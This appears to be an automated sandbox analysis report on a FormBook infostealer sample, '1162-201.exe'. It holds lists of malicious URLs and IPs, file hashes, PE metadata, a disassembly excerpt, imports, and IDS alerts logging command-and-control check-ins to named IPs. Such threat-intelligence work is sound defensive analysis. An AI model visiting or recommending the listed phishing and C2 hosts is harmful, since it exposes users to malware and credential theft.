AMAZON-02US | https://db.nemovault.com/ | malicious | Unknown | 3.74.237.181
CLOUDFLARENETUS | https://cdn.btmessage.com/ | malicious | HTMLPhisher | 172.67.74.232
CLOUDFLARENETUS | http://www.austrata.net.au | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | https://www.cineuserdad.ec | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | https://form.fillout.com/t/emEtLm993dus | malicious | Unknown | 104.26.1.150
CLOUDFLARENETUS | https://form.fillout.com/t/emEtLm993dus | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | http://www.jmclmedia.ph | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | Invoice_R6GPN23V_TransactionSuccess.html.html | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | https://ik.imagekit.io/nrof2h909/Sherman%20Pruitt,%20Chief%20of%20Police,%20MSCJ.pdf?updatedAt=1736444487005 | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | https://blacktrunkstore.com/ | malicious | Unknown | 104.19.230.21
CLOUDFLARENETUS | https://rachelfix-enum.staging-homes.rewiringamerica.org/ | malicious | Unknown | 104.26.0.188
VODANETInternationalIP-BackboneofVodafoneDE | 5.elf | malicious | Unknown | 88.79.50.180
VODANETInternationalIP-BackboneofVodafoneDE | 6.elf | malicious | Unknown | 178.10.231.77
VODANETInternationalIP-BackboneofVodafoneDE | armv4l.elf | malicious | Unknown | 88.68.235.154
VODANETInternationalIP-BackboneofVodafoneDE | Fantazy.sh4.elf | malicious | Unknown | 188.101.106.73
VODANETInternationalIP-BackboneofVodafoneDE | Fantazy.i486.elf | malicious | Unknown | 188.97.99.47
VODANETInternationalIP-BackboneofVodafoneDE | Fantazy.mpsl.elf | malicious | Unknown | 188.110.169.89
VODANETInternationalIP-BackboneofVodafoneDE | sora.m68k.elf | malicious | Unknown | 2.205.253.121
VODANETInternationalIP-BackboneofVodafoneDE | QUOTATION#050125.exe | malicious | FormBook | 47.83.1.90
VODANETInternationalIP-BackboneofVodafoneDE | QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook | 47.83.1.90
VODANETInternationalIP-BackboneofVodafoneDE | 4.elf | malicious | Unknown | 109.85.248.172
                                                                    No context
                                                                    No context
                                                                    Process:C:\Windows\SysWOW64\chkntfs.exe
                                                                    File Type:Unknown
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1239949490932863
                                                                    Encrypted:false
                                                                    SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                    MD5:271D5F995996735B01672CF227C81C17
                                                                    SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                    SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                    SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                    Malicious:false
                                                                    Reputation:high, very likely benign file
                                                                    Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\1162-201.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):290816
                                                                    Entropy (8bit):7.993414361799452
                                                                    Encrypted:true
                                                                    SSDEEP:6144:Xg81IqdH904SJgZ6NF1lW8zEpqi9cyCTTvLg7YEOmj2lga78ytrmc:Xg8VzBSJgZy1Q8o0TvxEPaaaFrL
                                                                    MD5:A16B0681F89209738D9E0831D233A203
                                                                    SHA1:42E176270516C9BE7795631BCB496A6271D69CBD
                                                                    SHA-256:264A11118D0EEE66D0F3FBC9A5C79EED9C953219A7E012EB99BE7C99A8AE44C7
                                                                    SHA-512:3CB89F1D05EF3BDCBAF6888905DED4B23DE9C942D92566D914645E33E4EE6F17CA7CD73C534CFCC4DDF23BEBC38EA020FC857008D269E1DE6ED86D4363E35A46
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:.m.OB2ALVEMD..E7.I7JOA2A.REMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALR.MDDHZ.[I.C.`.@..d.,-5eG'&P8.,."-<+"0d$ .'<Yj&/....e + #k:XC.JOA2ALR<LM.{%P.tW-.|R&.H..~&".O.s!U.V..x$!.e<*_w/&.ALREMDDF.rUI{KNAn..EMDDFE7U.7HNJ3JLR.IDDFE7UI7J.S2ALBEMD4BE7U.7J_A2ANREKDDFE7UI1JOA2ALRE=@DFG7UI7JOC2..RE]DDVE7UI'JOQ2ALREMTDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2Ab& 50DFEc.M7J_A2A.VEMTDFE7UI7JOA2ALReMD$FE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDF
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.421622390695377
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:1162-201.exe
                                                                    File size:1'618'432 bytes
                                                                    MD5:334085b11d8f0dcad01bb1c6414acc91
                                                                    SHA1:a6c57fab8877a751fc8da1fa0a2a5483f706d43f
                                                                    SHA256:c4b0ffc82218c157054043b17c17295dc2117b3ddf54f78c6480a0f0f45fb070
                                                                    SHA512:086927e1977219ee04ef1f168f1f722e20595c8d244e031f0e9ad5af2948544d1070cc479bff22d97711373ff7e19cf250e8485b2e3b9c6ea80267889e6e90fe
                                                                    SSDEEP:24576:XqDEvCTbMWu7rQYlBQcBiT6rprG8aYW9/B66CzmtDRs98wsQSv4qG3:XTvC/MTQYxsWR7aYE/B66xK98wsQSk
                                                                    TLSH:9175E10273D1D022FF9BA2734B5AF6115ABC7A260123E61F13981DB9BE701B1563E763
                                                                    File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                                    Icon Hash:aaf3e3e3938382a0
                                                                    Entrypoint:0x420577
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x677F3174 [Thu Jan 9 02:16:20 2025 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:1
                                                                    File Version Major:5
                                                                    File Version Minor:1
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:1
                                                                    Import Hash:948cc502fe9226992dce9417f952fce3
                                                                    Instruction
                                                                    call 00007FFB3103E893h
                                                                    jmp 00007FFB3103E19Fh
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push esi
                                                                    push dword ptr [ebp+08h]
                                                                    mov esi, ecx
                                                                    call 00007FFB3103E37Dh
                                                                    mov dword ptr [esi], 0049FDF0h
                                                                    mov eax, esi
                                                                    pop esi
                                                                    pop ebp
                                                                    retn 0004h
                                                                    and dword ptr [ecx+04h], 00000000h
                                                                    mov eax, ecx
                                                                    and dword ptr [ecx+08h], 00000000h
                                                                    mov dword ptr [ecx+04h], 0049FDF8h
                                                                    mov dword ptr [ecx], 0049FDF0h
                                                                    ret
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push esi
                                                                    push dword ptr [ebp+08h]
                                                                    mov esi, ecx
                                                                    call 00007FFB3103E34Ah
                                                                    mov dword ptr [esi], 0049FE0Ch
                                                                    mov eax, esi
                                                                    pop esi
                                                                    pop ebp
                                                                    retn 0004h
                                                                    and dword ptr [ecx+04h], 00000000h
                                                                    mov eax, ecx
                                                                    and dword ptr [ecx+08h], 00000000h
                                                                    mov dword ptr [ecx+04h], 0049FE14h
                                                                    mov dword ptr [ecx], 0049FE0Ch
                                                                    ret
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push esi
                                                                    mov esi, ecx
                                                                    lea eax, dword ptr [esi+04h]
                                                                    mov dword ptr [esi], 0049FDD0h
                                                                    and dword ptr [eax], 00000000h
                                                                    and dword ptr [eax+04h], 00000000h
                                                                    push eax
                                                                    mov eax, dword ptr [ebp+08h]
                                                                    add eax, 04h
                                                                    push eax
                                                                    call 00007FFB31040F3Dh
                                                                    pop ecx
                                                                    pop ecx
                                                                    mov eax, esi
                                                                    pop esi
                                                                    pop ebp
                                                                    retn 0004h
                                                                    lea eax, dword ptr [ecx+04h]
                                                                    mov dword ptr [ecx], 0049FDD0h
                                                                    push eax
                                                                    call 00007FFB31040F88h
                                                                    pop ecx
                                                                    ret
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push esi
                                                                    mov esi, ecx
                                                                    lea eax, dword ptr [esi+04h]
                                                                    mov dword ptr [esi], 0049FDD0h
                                                                    push eax
                                                                    call 00007FFB31040F71h
                                                                    test byte ptr [ebp+08h], 00000001h
                                                                    pop ecx
                                                                    Programming Language:
                                                                    • [ C ] VS2008 SP1 build 30729
                                                                    • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0xb4734 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x189000 | 0x7594 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0xb4734 | 0xb4800 | e36863623da164c21a2d45769f7ffac7 | False | 0.9637752120844876 | data | 7.963063195326604 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x189000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xd46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xd47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xd4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xd4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xd5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xd6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xd69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xd8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xda038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xda4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xda4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xdaa84 | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0xdb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xdb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xdbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xdc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xdc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xdc7b8 | 0xab9fc | data | | | 1.0003143795200946
RT_GROUP_ICON | 0x1881b4 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x18822c | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x188240 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x188254 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x188268 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x188344 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp                        SID      Signature                                     Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2025-01-10T09:09:55.087538+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.6  50026        172.67.148.216  80         TCP
2025-01-10T09:09:55.087538+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.6  50026        172.67.148.216  80         TCP
2025-01-10T09:10:56.986600+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.6  49982        172.65.235.97   80         TCP
2025-01-10T09:10:56.986600+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.6  49982        172.65.235.97   80         TCP
2025-01-10T09:11:12.568089+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  49983        192.64.119.109  80         TCP
2025-01-10T09:11:15.182909+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  49985        192.64.119.109  80         TCP
2025-01-10T09:11:17.715087+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  49986        192.64.119.109  80         TCP
2025-01-10T09:11:20.332386+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.6  49987        192.64.119.109  80         TCP
2025-01-10T09:11:20.332386+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.6  49987        192.64.119.109  80         TCP
2025-01-10T09:11:26.645856+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  49988        188.114.96.3    80         TCP
2025-01-10T09:11:29.180718+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  49989        188.114.96.3    80         TCP
2025-01-10T09:11:31.729322+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  49990        188.114.96.3    80         TCP
2025-01-10T09:11:34.316833+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.6  49991        188.114.96.3    80         TCP
2025-01-10T09:11:34.316833+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.6  49991        188.114.96.3    80         TCP
2025-01-10T09:11:40.868995+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  49992        47.83.1.90      80         TCP
2025-01-10T09:11:43.415794+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  49993        47.83.1.90      80         TCP
2025-01-10T09:11:45.976305+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  49994        47.83.1.90      80         TCP
2025-01-10T09:11:48.625013+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.6  49995        47.83.1.90      80         TCP
2025-01-10T09:11:48.625013+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.6  49995        47.83.1.90      80         TCP
2025-01-10T09:12:11.142217+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.6  49997        162.0.236.169   80         TCP
